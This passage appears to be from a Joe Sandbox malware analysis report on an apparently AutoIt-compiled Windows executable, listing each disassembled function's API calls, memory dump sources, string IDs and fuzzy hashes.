                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00254085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00223145
                                                                                                                                                                  • LoadStringW.USER32(00000000,?,00254085,00000016), ref: 0022314E
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00254085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00223170
                                                                                                                                                                  • LoadStringW.USER32(00000000,?,00254085,00000016), ref: 00223173
                                                                                                                                                                  • __swprintf.LIBCMT ref: 002231B3
                                                                                                                                                                  • __swprintf.LIBCMT ref: 002231C5
                                                                                                                                                                  • _wprintf.LIBCMT ref: 0022326C
                                                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00223283
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                  • API String ID: 984253442-2268648507
                                                                                                                                                                  • Opcode ID: 64fa725bfb9d3f968bcf80e1a8fa873679264925d2a59a7d094235cbc9e3403e
                                                                                                                                                                  • Instruction ID: 4b0107010fb735c984752aa91e53d46de872610c9a94bdfa04a01960e63d7f38
                                                                                                                                                                  • Opcode Fuzzy Hash: 64fa725bfb9d3f968bcf80e1a8fa873679264925d2a59a7d094235cbc9e3403e
                                                                                                                                                                  • Instruction Fuzzy Hash: 8C417071910259BACB04FBE1DD86EEEB77DAF24700F100065F205B20A2EB756F14CAA0
                                                                                                                                                                  Function 0021957D Relevance: 22.7, APIs: 15, Instructions: 210COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 884005220-0
                                                                                                                                                                  • Opcode ID: b5cb324c71dbc095b6a52ff8f13cc130de442c791106f8b835783c9e8f9e0a43
                                                                                                                                                                  • Instruction ID: 4fbed83a7f57eeeeded35fd421a9a97f8a9d4c2718802db1790ec61b34a70a3b
                                                                                                                                                                  • Opcode Fuzzy Hash: b5cb324c71dbc095b6a52ff8f13cc130de442c791106f8b835783c9e8f9e0a43
                                                                                                                                                                  • Instruction Fuzzy Hash: 7061F272930306EFEB249F34DC55BE9B7E8AF25320F244125E8059B1C2DB75D8E18E65
                                                                                                                                                                  Function 0021B593 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0021B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0021B903
                                                                                                                                                                    • Part of subcall function 0021B8E7: GetLastError.KERNEL32(?,0021B3CB,?,?,?), ref: 0021B90D
                                                                                                                                                                    • Part of subcall function 0021B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0021B3CB,?,?,?), ref: 0021B91C
                                                                                                                                                                    • Part of subcall function 0021B8E7: RtlAllocateHeap.NTDLL(00000000,?,0021B3CB), ref: 0021B923
                                                                                                                                                                    • Part of subcall function 0021B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0021B93A
                                                                                                                                                                    • Part of subcall function 0021B982: GetProcessHeap.KERNEL32(00000008,0021B3E1,00000000,00000000,?,0021B3E1,?), ref: 0021B98E
                                                                                                                                                                    • Part of subcall function 0021B982: RtlAllocateHeap.NTDLL(00000000,?,0021B3E1), ref: 0021B995
                                                                                                                                                                    • Part of subcall function 0021B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0021B3E1,?), ref: 0021B9A6
                                                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0021B5F7
                                                                                                                                                                  • _memset.LIBCMT ref: 0021B60C
                                                                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0021B62B
                                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 0021B63C
                                                                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 0021B679
                                                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0021B695
                                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 0021B6B2
                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0021B6C1
                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0021B6C8
                                                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0021B6E9
                                                                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 0021B6F0
                                                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0021B721
                                                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0021B747
                                                                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0021B75B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2347767575-0
                                                                                                                                                                  • Opcode ID: 30a96292277f0ec05544070040d5cad293a683e7f3c66330c55e13637a929ca4
                                                                                                                                                                  • Instruction ID: 39a8059bcfdd57fc1e8e95ad76a3004ffba28f07f3c9f4cc0632e767f47bbb1d
                                                                                                                                                                  • Opcode Fuzzy Hash: 30a96292277f0ec05544070040d5cad293a683e7f3c66330c55e13637a929ca4
                                                                                                                                                                  • Instruction Fuzzy Hash: BA516E75A1020AAFDF019FA0DD49EEEBBB9FF54300F048159F915A7290D7709A66CB60
                                                                                                                                                                  Function 0023A268 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDC.USER32(00000000), ref: 0023A2DD
                                                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0023A2E9
                                                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 0023A2F5
                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 0023A302
                                                                                                                                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0023A356
                                                                                                                                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 0023A392
                                                                                                                                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0023A3B6
                                                                                                                                                                  • SelectObject.GDI32(00000006,?), ref: 0023A3BE
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0023A3C7
                                                                                                                                                                  • DeleteDC.GDI32(00000006), ref: 0023A3CE
                                                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 0023A3D9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                  • String ID: (
                                                                                                                                                                  • API String ID: 2598888154-3887548279
                                                                                                                                                                  • Opcode ID: f568e2df1ff4e3b08c51f9d72d1b8989a4abbcc9dd067b0ad7fb7b85fe8dbf23
                                                                                                                                                                  • Instruction ID: ee24a5d1c1461fd8a854f99eddb1f581474b20bfe25d53297727c1d556e4e728
                                                                                                                                                                  • Opcode Fuzzy Hash: f568e2df1ff4e3b08c51f9d72d1b8989a4abbcc9dd067b0ad7fb7b85fe8dbf23
                                                                                                                                                                  • Instruction Fuzzy Hash: CE515EB1A10309EFDB14CFA4DC88EAEBBB9EF48310F14845DF99AA7250C771A851CB50
                                                                                                                                                                  Function 0024E541 Relevance: 21.1, APIs: 14, Instructions: 129commemoryfileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0024E57B
                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0024E586
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0024E593
                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0024E59C
                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0024E5AB
                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0024E5B4
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0024E5BB
                                                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0024E5CC
                                                                                                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,0026D9BC,?), ref: 0024E5E5
                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0024E5F5
                                                                                                                                                                  • GetObjectW.GDI32(?,00000018,000000FF), ref: 0024E619
                                                                                                                                                                  • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0024E644
                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0024E66C
                                                                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0024E682
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Global$CloseFileHandleObject$AllocCopyCreateDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1759995340-0
                                                                                                                                                                  • Opcode ID: fe20e6b2c81f81d2ab204216fe89388195c2e55af8cb89c9134fb647530948c1
                                                                                                                                                                  • Instruction ID: 9077e4e19e61070946a9b2489144256c985c18a7a65479a710a1d48f9fec14f0
                                                                                                                                                                  • Opcode Fuzzy Hash: fe20e6b2c81f81d2ab204216fe89388195c2e55af8cb89c9134fb647530948c1
                                                                                                                                                                  • Instruction Fuzzy Hash: B2415975A00209EFDB219F65EC8CEAA7BB9FF89711F118058F906972A0D7B09D10DB20
                                                                                                                                                                  Function 00243AF7 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00242AA6,?,?), ref: 00243B0E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$|E)
                                                                                                                                                                  • API String ID: 3964851224-2497493821
                                                                                                                                                                  • Opcode ID: 2064e7c05dc7a7f2655eb442074ffcafbe0cd092c5c6ef4f1aaf10e1b805290b
                                                                                                                                                                  • Instruction ID: 69c47a513a5f3f662cab39a495aa31741995739349ed97d7c1406cd758865431
                                                                                                                                                                  • Opcode Fuzzy Hash: 2064e7c05dc7a7f2655eb442074ffcafbe0cd092c5c6ef4f1aaf10e1b805290b
                                                                                                                                                                  • Instruction Fuzzy Hash: 5041BF7416024A8BDF08EF44E890AEA3365BF36394F540829FC615B295DBB09E2BCB50
                                                                                                                                                                  Function 0022D950 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 100COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0022D96C
                                                                                                                                                                  • __swprintf.LIBCMT ref: 0022D98E
                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0022D9CB
                                                                                                                                                                  • _memset.LIBCMT ref: 0022DA0F
                                                                                                                                                                  • _wcsncpy.LIBCMT ref: 0022DA4B
                                                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 0022DA80
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0022DA8B
                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 0022DA94
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0022DA9E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseDirectoryHandle$ControlCreateDeviceFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                                  • String ID: :$\$\??\%s
                                                                                                                                                                  • API String ID: 1122224643-3457252023
                                                                                                                                                                  • Opcode ID: efe8986c0e116e271a0093757b8b2c21c6c67a61d68cf53a449386bbcf80668b
                                                                                                                                                                  • Instruction ID: 1644451b55dc64ba457669f04bc099a02def00198f71c5a2493ba1bff57b4525
                                                                                                                                                                  • Opcode Fuzzy Hash: efe8986c0e116e271a0093757b8b2c21c6c67a61d68cf53a449386bbcf80668b
                                                                                                                                                                  • Instruction Fuzzy Hash: 7C31C871A1021DBBDB20DFA4EC49FDA77BCBF89700F0081A5F519D20A1E770DA948BA1
                                                                                                                                                                  Function 002232B0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 72windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00253C64,00000010,00000000,Bad directive syntax error,0027DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 002232D1
                                                                                                                                                                  • LoadStringW.USER32(00000000,?,00253C64,00000010), ref: 002232D8
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                  • _wprintf.LIBCMT ref: 00223309
                                                                                                                                                                  • __swprintf.LIBCMT ref: 0022332B
                                                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00223395
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:$"*
                                                                                                                                                                  • API String ID: 1506413516-1217663547
                                                                                                                                                                  • Opcode ID: 58edf2b1659332f3bf6ae72d92f0ce8a693af0124e7ea7c698090462b42d7308
                                                                                                                                                                  • Instruction ID: dd8ef2eface0a22d36247b0a84fd9445ba1973b09274367b4aa2b93c6f3b3709
                                                                                                                                                                  • Opcode Fuzzy Hash: 58edf2b1659332f3bf6ae72d92f0ce8a693af0124e7ea7c698090462b42d7308
                                                                                                                                                                  • Instruction Fuzzy Hash: CE217131860259BBCF01EFD1DC0AEEE7775BF24704F004456F515610A2DBB59B68DBA0
                                                                                                                                                                  Function 00230B20 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 229COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • __wsplitpath.LIBCMT ref: 00230C93
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00230CAB
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00230CBD
                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00230CD2
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00230CE6
                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00230CFE
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00230D2A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentDirectory$_wcscat$AttributesFile__wsplitpath
                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                  • API String ID: 4196653570-438819550
                                                                                                                                                                  • Opcode ID: 1c6a4ec98043a69b8ef3fcbf0aa717dab8f6303ea165d8bb9ec6dfd2806f37a6
                                                                                                                                                                  • Instruction ID: 288157889862a58e2ca963b4ef66552c2b1c13a0ae51cf01b090cbd990be52a2
                                                                                                                                                                  • Opcode Fuzzy Hash: 1c6a4ec98043a69b8ef3fcbf0aa717dab8f6303ea165d8bb9ec6dfd2806f37a6
                                                                                                                                                                  • Instruction Fuzzy Hash: 1681C5B15243099FC724DF64C894AAAB7E8FF98304F148D2AF885C7251E770ED55CB62
                                                                                                                                                                  Function 0022D520 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 144COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadStringW.USER32(00000066,?,00000FFF), ref: 0022D567
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                  • LoadStringW.USER32(?,?,00000FFF,?), ref: 0022D589
                                                                                                                                                                  • __swprintf.LIBCMT ref: 0022D5DC
                                                                                                                                                                  • _wprintf.LIBCMT ref: 0022D68D
                                                                                                                                                                  • _wprintf.LIBCMT ref: 0022D6AB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                  • API String ID: 2116804098-2391861430
                                                                                                                                                                  • Opcode ID: c89bc926a5d7597056dbe730bcd61ea3e50e2e58b43c396de80faa8da5bfc9b0
